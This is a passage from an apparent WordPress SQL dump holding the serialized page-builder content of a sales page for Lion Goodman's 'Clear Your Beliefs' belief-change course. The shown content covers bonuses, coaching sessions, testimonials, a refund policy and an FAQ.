class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1550, 2004, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent 